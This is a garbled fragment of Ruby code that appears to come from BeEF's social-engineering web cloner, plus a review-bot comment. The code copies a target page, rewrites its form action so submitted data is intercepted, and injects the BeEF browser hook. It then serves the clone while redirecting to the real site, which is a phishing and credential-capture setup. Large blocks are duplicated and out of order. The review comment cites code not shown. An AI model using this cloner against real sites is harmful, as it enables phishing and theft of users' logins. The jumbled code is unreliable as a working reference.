# modify the form 'action' attribute
line_attrs.each do |attr|
if attr.include? "action=\""
print_info "Form action found: #{attr}"
break
if success
File.open("#{@cloned_pages_dir + output_mod}", 'w') do |out_file|
File.open("#{@cloned_pages_dir + output}", 'r').each do |line|
# Modify the <form> line changing the action URI to / in order to be properly intercepted by BeEF
if line.include?("<form ")
line_attrs = line.split(" ")
c = 0
cc = 0
#todo: probably doable also with map!
# modify the form 'action' attribute
line_attrs.each do |attr|
if attr.include? "action=\""
print_info "Form action found: #{attr}"
break
end
c += 1
end
c += 1
line_attrs[c] = "action=\"#{mount}\""
#todo: to be tested, needed in case like yahoo
# delete the form 'onsubmit' attribute
#line_attrs.each do |attr|
# if attr.include? "onsubmit="
# print_info "Form onsubmit event found: #{attr}"
# break
# end
# cc += 1
#end
#line_attrs[cc] = ""
mod_form = line_attrs.join(" ")
print_info "Form action value changed in order to be intercepted :-D"
out_file.print mod_form
# Add the BeEF hook
elsif line.include?("</head>") && @config.get('beef.extension.social_engineering.web_cloner.add_beef_hook')
out_file.print add_beef_hook(line)
print_info "BeEF hook added :-D"
else
out_file.print line
end
line_attrs[c] = "action=\"#{mount}\""
#todo: to be tested, needed in case like yahoo
# delete the form 'onsubmit' attribute
#line_attrs.each do |attr|
# if attr.include? "onsubmit="
# print_info "Form onsubmit event found: #{attr}"
# break
# end
# cc += 1
#end
#line_attrs[cc] = ""
mod_form = line_attrs.join(" ")
print_info "Form action value changed in order to be intercepted :-D"
out_file.print mod_form
# Add the BeEF hook
elsif line.include?("</head>") && @config.get('beef.extension.social_engineering.web_cloner.add_beef_hook')
out_file.print add_beef_hook(line)
print_info "BeEF hook added :-D"
else
out_file.print line
end
end
end
if File.size("#{@cloned_pages_dir + output}") > 0
print_info "Page at URL [#{url}] has been cloned. Modified HTML in [cloned_paged/#{output_mod}]"
file_path = @cloned_pages_dir + output_mod # the path to the cloned_pages directory where we have the HTML to serve
# Check if the original URL can be framed
frameable = is_frameable(url)
interceptor = BeEF::Extension::SocialEngineering::Interceptor
interceptor.set :redirect_to, url
interceptor.set :frameable, frameable
interceptor.set :beef_hook, @beef_hook
interceptor.set :cloned_page, get_page_content(file_path)
interceptor.set :db_entry, persist_page(url,mount)
@http_server.mount("#{mount}", interceptor.new)
print_info "Mounting cloned page on URL [#{mount}]"
@http_server.remap
success = true
else
print_error "Error cloning #{url}. Be sure that you don't have errors while retrieving the page with 'wget'."
success = false
end
end
success
if File.size("#{@cloned_pages_dir + output}") > 0
print_info "Page at URL [#{url}] has been cloned. Modified HTML in [cloned_paged/#{output_mod}]"
file_path = @cloned_pages_dir + output_mod # the path to the cloned_pages directory where we have the HTML to serve
# Check if the original URL can be framed
frameable = is_frameable(url)
interceptor = BeEF::Extension::SocialEngineering::Interceptor
interceptor.set :redirect_to, url
interceptor.set :frameable, frameable
interceptor.set :beef_hook, @beef_hook
interceptor.set :cloned_page, get_page_content(file_path)
interceptor.set :db_entry, persist_page(url,mount)
@http_server.mount("#{mount}", interceptor.new)
print_info "Mounting cloned page on URL [#{mount}]"
@http_server.remap
success = true
else
print_error "Error cloning #{url}. Be sure that you don't have errors while retrieving the page with 'wget'."
success = false
end
success
end
private
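Review bot: With `use_existing` set, the download and rewrite steps are skipped, yet the guard that follows still tests `File.size("#{@cloned_pages_dir + output}")`, the raw wget output, while the content that gets mounted is read from `output_mod` (assigned outside the hunk). If the raw file is absent `File.size` raises `Errno::ENOENT`, which nothing in the visible lines rescues, and if only the `_mod` file is missing the failure moves into `get_page_content`. Test the file that will be served and use the nil-returning form: `served = @cloned_pages_dir + (use_existing ? output_mod : output)` followed by `if File.size?(served)`. The usage comment also documents the request key as `"uri"` where the REST handler reads `body["url"]`, and the `rescue Exception` around `IO.popen` would be better narrowed to `rescue StandardError => e` so interrupts and exits are not swallowed.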